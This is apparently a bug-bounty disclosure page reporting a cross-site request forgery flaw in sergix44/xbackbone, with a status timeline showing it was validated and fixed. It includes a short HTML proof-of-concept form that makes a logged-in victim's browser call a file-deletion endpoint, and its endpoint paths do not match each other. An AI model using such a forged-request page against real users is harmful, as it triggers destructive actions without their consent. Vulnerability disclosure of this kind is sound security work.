We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

/

Cross-Site Request Forgery (CSRF) in sergix44/xbackbone

Valid

Reported on

Jul 30th 2021

✍️ Description

following endpoint vulnerable to CSRF: /omeka/upload/1/delete Also there is not any different that you run The application in localhost or some real hosts, this is enough to login with a browser that used the browser for online web surfacing too.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/omeka/system/deleteOrphanFiles">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of delete any file.

Occurrences

app.js L1

We have contacted a member of the sergix44/xbackbone team and are waiting to hear back 2 years ago

Sergio Brighenti validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

Sergio Brighenti marked this as fixed with commit 840208 2 years ago

Sergio Brighenti has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

We have contacted a member of the sergix44/xbackbone team and are waiting to hear back 2 years ago

Sergio Brighenti validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

Sergio Brighenti marked this as fixed with commit 840208 2 years ago

Sergio Brighenti has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation